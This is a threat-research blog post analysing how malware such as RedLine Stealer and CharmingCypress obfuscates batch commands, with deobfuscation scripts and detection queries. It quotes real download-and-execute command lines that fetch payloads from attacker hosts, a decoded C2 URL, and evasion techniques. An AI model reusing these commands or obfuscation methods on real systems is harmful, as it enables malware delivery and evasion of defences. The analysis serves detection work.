Securonix Threat Research Knowledge Sharing Series: Batch (DOS) Obfuscation or DOSfuscation: Why It’s on the Rise, and How Attackers are Hiding in Obscurity

By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov

tldr: Malware frequently passes obfuscated code into cmd.exe so that it can infect its target without being detected. Let’s look at some real-world examples of what threat actors are doing, and how they can be detected.

Last year we touched on how threat actors leverage PowerShell and how code can be obfuscated to avoid detection. Recently, the Securonix Threat Research team has been monitoring a trend known as batch (DOS) obfuscation, or DOSfuscation, in which an increasing number of malware samples use obfuscated code contained within batch or DOS-based scripts.

This trend was likely brought about when Microsoft made the decision to disable macro execution in Office products by default. Since then, there has been a rise in shortcut-based (.lnk file) execution coming from archived email attachments. CMD obfuscation is the natural next step, as any command line passed into a shortcut file will most likely be executed using cmd.exe as the initial process.

But why cmd.exe when there are much more robust code execution platforms out there? One answer could be that the Windows Antimalware Scan Interface (AMSI) supports several scripting engines natively, including PowerShell, JavaScript, and VBScript. However, AMSI doesn’t directly support batch scripts (.bat files) or commands executed using cmd.exe. This is partly because batch files are a much older technology and are generally more limited in functionality than PowerShell scripts, which can execute a wide range of complex operations, including direct interactions with the Windows API. This gap makes batch an easy win for attackers looking to reduce the likelihood of an antivirus (AV) hit during initial code execution.

As with obfuscation methods in PowerShell, or any other scripting language for that matter, the goal of obfuscating commands is simply to avoid detection, whether that detection comes from antivirus software or from a human such as a SOC analyst.

Malware families that use obfuscated batch scripts

Looking back over the past few years, some of the more recent malware campaigns or attack frameworks that leverage obfuscated DOS/batch scripts include the following:

  • More Eggs
  • Underground Team ransomware
  • Villain/Hoaxshell
  • Trickbot
  • OCX#HARVESTER
  • STEEP#MAVERICK
  • SeroXen
  • BatCloak
  • AsyncRAT
  • YourCyanide
  • Batloader
  • CharmingCypress
  • Redline Stealer

Obfuscation methods

In general, code obfuscation is the deliberate process of transforming the original source code into a more complex and convoluted version, which is challenging to interpret and analyze by security analysts or threat researchers. This technique is employed with the intent of either evading AV detection systems or hindering the efforts of reverse engineering the code by cybersecurity professionals. However, it is crucial for the obfuscated code to maintain its intended functionality and execute flawlessly, despite how it looks; otherwise, the purpose of obfuscation would be rendered ineffective.

Both obfuscating and deobfuscating code can be challenging; however, there are many online tools that can assist in this effort, such as Invoke-DOSfuscation from Daniel Bohannon. While there are many techniques threat actors use to hide code in command lines or batch files, we’ll cover some of the more common methods that our team has seen recently in the wild.

Incorporating malware

Threat actors and malware authors will generally execute obfuscated batch scripts during the initial execution phase of the attack chain. Today, this often takes the form of a .lnk or shortcut file in Windows.

In one common scenario, a phishing email is delivered to the victim with a malicious zip file attachment. The user downloads and opens the zip, and inside is a shortcut file which presents itself as some interesting lure. The user double-clicks the shortcut, which might be disguised as a PDF or some other form of media file; however, the shortcut in fact links to cmd.exe with obfuscated code appended. This pattern appears in many samples, and it’s relatively easy for the attacker to implement.

In the example of the CharmingCypress malware family from earlier this year, the cmd.exe linked shortcut would contain obfuscated batch code that looks like the following:

/c set c=cu7rl --s7sl-no-rev7oke -s -d "id=VzXdED&Prog=2_Mal_vbs.txt&WH=The-global-.pdf" -X PO7ST hxxps://east-healthy-dress.glitch[.]me/Down -o %temp%\down.v7bs & call %c:7=% & set b=sta7rt "" "%temp%\down.v7bs" & call %b:7=%

This is only one example, and in the next section we’ll take a look at other real world examples and discover how we can deobfuscate and even detect obfuscation artifacts of real malware samples.
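The CharmingCypress command above hides “curl”, “POST”, and “start” by padding them with the character “7”, then strips the padding at run time with the “%c:7=%” replacement syntax. The following is a minimal Python sketch of that replacement step for offline analysis. The function name expand_replace and the shortened sample strings are our own illustrations, and the sketch uses a plain case-sensitive replace, which is a simplification of cmd.exe behavior.

```python
def expand_replace(value: str, old: str, new: str = "") -> str:
    """Approximate cmd.exe's %var:old=new% expansion.

    Simplification (assumption): a plain, case-sensitive replace of
    every occurrence of `old` with `new`.
    """
    return value.replace(old, new)


# Shortened fragments of the values assigned to variables "c" and "b" above.
c = "cu7rl -s -X PO7ST"
b = 'sta7rt "" "%temp%\\down.v7bs"'

print(expand_replace(c, "7"))
print(expand_replace(b, "7"))
```

Because the padding character is only ever removed, the same helper can be pointed at any variable value pulled from a similar sample, as long as the analyst reads the padding character from the “%name:X=%” reference.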

String splitting

This method is by far the simplest and is less of a counter-forensics or anti-analysis technique and more of an antivirus bypass technique. The idea behind splitting up known-bad strings is nothing new. We regularly see this in malicious PowerShell scripts, notably during the STEEP#MAVERICK campaign last year.

There are several ways to accomplish this technique, but the idea is to stuff extra characters in between CMD commands, parameters, or variables so that the string is split into several parts without hindering its execution. The attacker’s goal in this scenario is to bypass signature-based detection, whether in antivirus or in log-based detections. If the antivirus has a signature matching “whoami”, for example, it is possible that “wh^oam^i” could be ignored and execution will continue.

Figure 1: Obfuscated “ipconfig /all and whoami” command showing splitting strings using the caret symbol (highlighted)

As demonstrated in the figure above, a commonly used method is to stuff caret symbols (“^”), the cmd.exe escape character, inside obfuscated commands or scripts. cmd.exe discards them, provided they don’t escape a following character in a way that would break execution.

Additionally, quotation marks can be used to break up strings, provided that an even number of these characters is used. This obfuscation technique was used in the aforementioned STEEP#MAVERICK campaign reported last year.

Figure 2: Breaking up strings using quotation marks

Split strings: deobfuscation

Effort – minimal: If the command interpreter ignores these characters, so can we. The script can be opened or pasted into a text editor with find/replace capabilities, and the characters simply removed.
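For larger samples, the find/replace step can be scripted. The following is a rough Python sketch under stated assumptions: carets are treated as escape characters only outside double quotes, and the quote-stripping helper is meant for a single command token rather than a whole command line (where quotes may legitimately wrap arguments). The function names are our own.

```python
def strip_carets(command: str) -> str:
    """Remove caret escapes the way an analyst would when cleaning a sample.

    Assumption: outside double quotes, "^x" becomes "x" (so "^^" becomes
    "^"); inside double quotes, carets are left untouched.
    """
    out = []
    in_quotes = False
    i = 0
    while i < len(command):
        ch = command[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            # Drop the caret and keep the character it escapes, if any.
            if i + 1 < len(command):
                out.append(command[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def strip_inline_quotes(token: str) -> str:
    """Naively remove double quotes from a single token, e.g. w"ho"ami."""
    return token.replace('"', "")


print(strip_carets("i^pc^onf^ig /a^ll"))
print(strip_inline_quotes('w"ho"ami'))
```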

Variable substitution

For this example, let’s take a look at some of the obfuscation techniques used by RedLine Stealer. This particular stealer is very active today and has been making waves through search engine malvertising campaigns. The batch obfuscation method used here is a bit more advanced and requires some basic batch scripting knowledge. In batch, a new environment variable can be created using the “set” command. For example:

set newVar=hello world!

The new “newVar” variable can then be referenced in the script by wrapping it in percent symbols. For example it can be printed using:

echo %newVar%

As you guessed, running this command will print “hello world!” to standard output on the console. Attackers can abuse this by creating random or oddly named variables and stuffing them into random locations in the batch script.

Additionally, delayed expansion can be used when “set” assigns variables within a loop. Delayed variables use the “!variable!” syntax rather than the traditional “%variable%” syntax. This syntax only takes effect when delayed expansion is explicitly enabled, for example when the “/v” or “/v:on” parameter is passed to the cmd.exe process calling the batch script.

This method was used during the OCX#HARVESTER campaign we highlighted earlier this year. In this example, environment variables were set and placed throughout the initial script contained in a .lnk file.

Figure 3: Obfuscated .lnk payload from MORE_EGGS malware.

At this point we can forget about human readability, but at a high level, the variable substitution can be seen in action. For instance, take the following string from the figure above. While it’s clear that this is our C2 connection URL, let’s decode the rest for educational purposes.

%P203%%P436%%P436%p%P113%%P872%%P872%95.179.201.171/robots.%P405%p

Examining the script gives us the following values and their definitions:

%P203% = h
%P436% = t
%P436% = t
p (literal character)
%P113% = :
%P872% = /
%P872% = /
%P405% = ph

Now, putting it all together, we’re presented with the completed string:

http://95.179.201[.]171/robots.php
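The manual lookup above can be automated once the variable definitions have been collected from the script. The following is a minimal Python sketch, assuming the definitions have already been extracted into a dictionary by hand. The function name substitute is our own, and the sketch handles only plain “%NAME%” references, not delayed expansion or substring syntax.

```python
import re


def substitute(template: str, variables: dict) -> str:
    """Replace each %NAME% reference with its value from `variables`.

    Unknown names are left in place so the analyst can spot them.
    Variable names are compared case-insensitively, as in batch.
    """
    def lookup(match):
        name = match.group(1).upper()
        return variables.get(name, match.group(0))

    return re.sub(r"%([^%\s:]+)%", lookup, template)


# Values taken from the definitions listed above.
definitions = {"P203": "h", "P436": "t", "P113": ":", "P872": "/", "P405": "ph"}
obfuscated = "%P203%%P436%%P436%p%P113%%P872%%P872%95.179.201.171/robots.%P405%p"

print(substitute(obfuscated, definitions))
```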

Substitution: deobfuscation

Effort – medium/hard: In this particular case, for a script this size it is not too difficult to simply go through the script and perform a find/replace on values to uncover the original unobfuscated version. However, for much larger scripts where you can end up with hundreds or even thousands of variables, we recommend shifting gears by redirecting the execution flow.

At some point a script has to contain a command that executes the code. This can be “start x” or, as in this case, a call to the Windows binary wmic.exe in the form “wmic process call create x”. Sometimes a path to an exe file is used instead. If you can identify this portion of the script, you can redirect the script to “print” or “echo” its contents rather than executing them.

Variable index extraction

Now we’re getting even deeper into the weeds, where this level of obfuscation can take quite a bit of time to analyze before the script’s original intent becomes clear. Variable index extraction involves creating a new variable and setting it to a long string. Individual characters are then referenced by numerical index to build out the malicious command. It works similarly to referencing an array element.

Let’s take a look at a RedLine Stealer payload our team analyzed earlier this year. The script began with an interesting batch file named 3.bat. The batch file was first obfuscated using (spoiler alert) encoding manipulation. We’ll dive into that type of obfuscation in the next section.

Once decoded, we were presented with the following script. While it looks like a huge mess, let’s break it down into individual bites and see what it is we’re looking at.

Figure 4: Obfuscated RedLine Stealer payload using variable substitution and array character extraction – 3.bat

Part of what makes a script like this extremely confusing is the use of oddly named variables. Diving into the RedLine Stealer payload, it makes more sense as we break it into chunks and peel back the layers:

  1. This line simply clears the screen and uses the “set” command to create a new environment variable named “û§ C” and sets it to “ne4TaupFHgPWvM3jwImrL5qUZkBlRd17Sc z@KDGfCAYQ2iohVbs09Jt6XO8yxEN”. A Unicode non-breaking space (U+00A0) is present in the variable name. So not only are there special characters, but invisible ones at that!
  2. This chunk of code pulls individual characters from the “û§ C” variable to build a new command. Individual characters are extracted using the syntax “%variable:~start_index,length%”, where the start index is the character position (beginning with 0 for the first character) and the length is the number of characters to extract. In this example, the first four references are:
    Variable + Referenced Index Value
    %û§ C:~36,1% @
    %û§ C:~51,1% s
    %û§ C:~1,1% e
    %û§ C:~55,1% t

    Continuing this pattern will result in the obfuscated command in its entirety: @set “.JÃ.d=T2c4uSRDUJvLxzdM6rBwH1XKbYjmqA0GfV sOpgk9ieNCo3aE%ÃÃã´Ã¢%5yIhtP7FWln8ZQ@”

  3. The third block essentially repeats step two but with the newly created variable “.JÃ.d” and its associated variable value “T2c4uSRDUJvLxzdM6rBwH1XKbYjmqA0GfV sOpgk9ieNCo3aE%ÃÃã´Ã¢%5yIhtP7FWln8ZQ@”. Once decoded, we’re presented with the final deobfuscated code which will then execute on the host: cd %temp%  curl -o bud.exe hxxps://convertmast[.]com/bldd & start bbd.exe & curl -o bud2.exe hxxps://convertmast[.]com/bldd2 & start bud2.exe
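The character extraction in step two can be reproduced offline. The following is a minimal Python sketch, assuming non-negative offsets and lengths only. The variable name “key” is a hypothetical stand-in for the sample’s unprintable name, and the function name expand_substrings is our own.

```python
import re

# Matches references of the form %name:~start,length%.
SUBSTRING_REF = re.compile(r"%([^%:]+):~(\d+),(\d+)%")


def expand_substrings(expression: str, variables: dict) -> str:
    """Expand %name:~start,length% references using Python slicing.

    Assumption: only non-negative start/length values are handled,
    which covers the references shown in the sample above.
    """
    def extract(match):
        value = variables[match.group(1)]
        start, length = int(match.group(2)), int(match.group(3))
        return value[start:start + length]

    return SUBSTRING_REF.sub(extract, expression)


# The lookup string from step one, stored under a readable stand-in name.
variables = {
    "key": "ne4TaupFHgPWvM3jwImrL5qUZkBlRd17Sc z@KDGfCAYQ2iohVbs09Jt6XO8yxEN"
}
first_four = "%key:~36,1%%key:~51,1%%key:~1,1%%key:~55,1%"

print(expand_substrings(first_four, variables))
```

Running the sketch on the first four references yields the start of the “@set” command shown in step two.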

Variable index extraction: deobfuscation

Effort – hard: Deobfuscating this particular method and peeling back the layers can be challenging. Even good old dynamic analysis (simply running the code) might not surface the original unobfuscated script in process logs such as those from Sysmon.

We’ve found the best way to deobfuscate code using variable index extraction is to set the original variables manually in the terminal, and then use the “echo” command to print the values.

Figure 5: Deobfuscating RedLine Stealer payload using the “echo” command

In the figure above, we simply added an echo command before the payload, which prevents it from executing. Instead, it prints the deobfuscated values. The same process can then be repeated for each remaining block of obfuscated code in the original script.

Encoding manipulation

This particular type of obfuscation is rather interesting. It completely removes the human readability element as well as detection capabilities. While on the outside, this method of obfuscation looks like a nightmare to deal with, it’s actually quite simple to implement, as well as to deobfuscate.

Figure 6: RedLine Stealer character encoded payload

The figure above shows an actual encoded RedLine Stealer payload analyzed by our team. This type of obfuscation is still quite common and was recently seen in use by the Underground Team ransomware. It works by changing the encoding of the original file into something that would still execute, but present itself differently. In this case, the attackers altered the file so that it is read as UTF-16 LE.

Once the file is interpreted this way and opened with a text editor, it looks like pure nonsense to us humans.

Encoding manipulation: deobfuscation

Effort – easy: There are a number of online tools that can assist in deobfuscating this type of obfuscation; however, probably the simplest method is to convert the text back into UTF-8. This can be done by encoding the garbage text as UTF-16LE, which recovers the original bytes, using a CyberChef recipe or one of several Python or Batch scripts.

Figure 7: RedLine Stealer character encoded payload deobfuscated using CyberChef
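The re-encoding step described above can also be sketched in a few lines of Python. This is a minimal illustration rather than a full tool: it assumes the garbled text was copied from an editor that displayed the file as UTF-16 LE, and that the underlying script is UTF-8 or ASCII. Both function names are our own, and simulate_garbled_view exists only to create test input.

```python
def simulate_garbled_view(script: str) -> str:
    """Show how an editor would render script bytes read as UTF-16 LE.

    Assumption: the script is ASCII text; a trailing space is added when
    the byte count is odd so the bytes pair up cleanly.
    """
    data = script.encode("utf-8")
    if len(data) % 2:
        data += b" "
    return data.decode("utf-16-le")


def recover_script(garbled: str) -> str:
    """Encode the garbled text as UTF-16 LE, then read the bytes as UTF-8."""
    raw = garbled.encode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


original = "@echo off\r\nwhoami /all\r\n"
garbled = simulate_garbled_view(original)

print(repr(garbled))
print(recover_script(garbled))
```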

Use case – Villain / Hoaxshell

Last year, we took a deep dive into the Villain and Hoaxshell frameworks by @t3l3machus. In a recent change the framework now supports more than just PowerShell, including CMD-based connection strings as well. These changes recently surfaced on the popular reverse shell generation website, revshells.

Not surprisingly, due to the lack of AMSI protection, this method is quite effective at bypassing antivirus detections, even when using the out-of-the-box payloads generated using revshells. By manually adding another layer of obfuscation as we discussed previously, the likelihood of bypassing sophisticated EDR solutions only increases.

Figure 8: Hoaxshell bypassing Windows Defender

Summary – detecting the undetectable

While there are additional obfuscation methods a threat actor might use to hide their code, we went over some of the more recent heavy-hitters when it comes to popularity. While detecting code crafted specifically to bypass detections can be challenging, it’s not impossible. There are some reliable real-world detections that can give us some easy wins.

We highly recommend enabling process-level logging such as Windows Event ID 4688 with command-line auditing, and deploying Sysinternals Sysmon, for a layered defense-in-depth approach. Coverage on endpoints is critical, as endpoints are typically where the initial compromise occurs in the attack kill chain.

Below we’ve provided some relevant detections and spotter queries that Securonix customers can use to assist in detections or investigations where process and command-line logging are enabled.

Relevant provisional Securonix detections

  • EDR-ALL-1102-RU
  • EDR-ALL-1100-ER
  • EDR-ALL-1261-RU, WEL-ALL-1217-RU
  • EDR-ALL-1265-RU, WEL-ALL-1221-RU
  • EDR-ALL-1264-RU, WEL-ALL-1220-RU
  • EDR-ALL-1263-RU, WEL-ALL-1219-RU

Relevant hunting/spotter queries

  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (resourcecustomfield1 CONTAINS “s^et” OR resourcecustomfield1 CONTAINS “se^t” OR resourcecustomfield1 CONTAINS “^set” OR resourcecustomfield1 CONTAINS “set^” OR resourcecustomfield1 CONTAINS “s^e^t”)
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “for /L %” AND resourcecustomfield1 CONTAINS “!!” AND resourcecustomfield1 CONTAINS “/v:on”
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “for ” AND resourcecustomfield1 CONTAINS “in ” AND resourcecustomfield1 CONTAINS “do set” AND resourcecustomfield1 CONTAINS “/v:on” AND resourcecustomfield1 CONTAINS “!!”
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “/v:on” AND resourcecustomfield1 CONTAINS “!&&set ” AND resourcecustomfield1 CONTAINS “set “
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process Create” AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “/v:on” AND resourcecustomfield1 CONTAINS “!&&set ” AND resourcecustomfield1 CONTAINS “set “
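For teams without access to the queries above, the idea behind the first query (spotting caret-split variants of “set” in a logged command line) can be approximated in Python. This is only a rough sketch and not the Securonix detection logic. The function name has_caret_split and the sample command lines are hypothetical, and a real hunt would need tuning to limit false positives.

```python
import re


def has_caret_split(cmdline: str, keyword: str = "set") -> bool:
    """Return True if `keyword` appears with carets before, inside, or after it.

    Builds a pattern such as \\^*s\\^*e\\^*t\\^* and reports only the
    matches that actually contain a caret.
    """
    pattern = r"\^*" + r"\^*".join(re.escape(ch) for ch in keyword) + r"\^*"
    return any(
        "^" in match.group(0)
        for match in re.finditer(pattern, cmdline, re.IGNORECASE)
    )


# Hypothetical command lines as they might appear in process-creation logs.
samples = [
    "cmd.exe /c s^et a=who&&call %a%ami",
    "cmd.exe /c set a=1",
    "cmd.exe /v:on /c S^E^T x=y",
]
for line in samples:
    print(has_caret_split(line), line)
```

Generating the pattern from the keyword lets the same check be reused for other commands (for example “call” or “start”) without listing every caret placement by hand.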

MITRE ATT&CK matrix

Tactics and techniques

Defense Evasion
  • T1027: Obfuscated Files or Information
  • T1027.010: Obfuscated Files or Information: Command Obfuscation
  • T1140: Deobfuscate/Decode Files or Information

Execution
  • T1059: Command and Scripting Interpreter
  • T1059.003: Command and Scripting Interpreter: Windows Command Shell

References

  1. Securonix Threat Research Knowledge Sharing: Hiding the PowerShell Execution Flow
    https://www.securonix.com/blog/hiding-the-powershell-execution-flow/
  2. Detecting STEEP#MAVERICK: New Covert Attack Campaign Targeting Military Contractors
    https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/
  3. CharmingCypress: Innovating Persistence
    https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/
  4. New OCX#HARVESTER Attack Campaign Leverages a Modernized More_eggs Suite to Target Victims
    https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/
  5. EnableDelayedExpansion
    https://ss64.com/nt/delayedexpansion.html
  6. TrickBot malware uses obfuscated Windows batch script to evade detection
    https://www.bleepingcomputer.com/news/security/trickbot-malware-uses-obfuscated-windows-batch-script-to-evade-detection/
  7. Malvertising through search engines
    https://securelist.com/malvertising-through-search-engines/108996/
  8. Command line process auditing
    https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing
  9. Hoaxshell/Villain Powershell Backdoor Generator Payloads in the Wild, and How to Detect in Your Environment
    https://www.securonix.com/blog/hoaxshell-villain-powershell-backdoor-generator-payloads-in-the-wild-and-how-to-detect-in-your-environment/
  10. Underground Team Ransomware Demands Nearly $3 Million
    https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/
  11. Analyzing the FUD Malware Obfuscation Engine BatCloak
    https://www.trendmicro.com/en_us/research/23/f/analyzing-the-fud-malware-obfuscation-engine-batcloak.html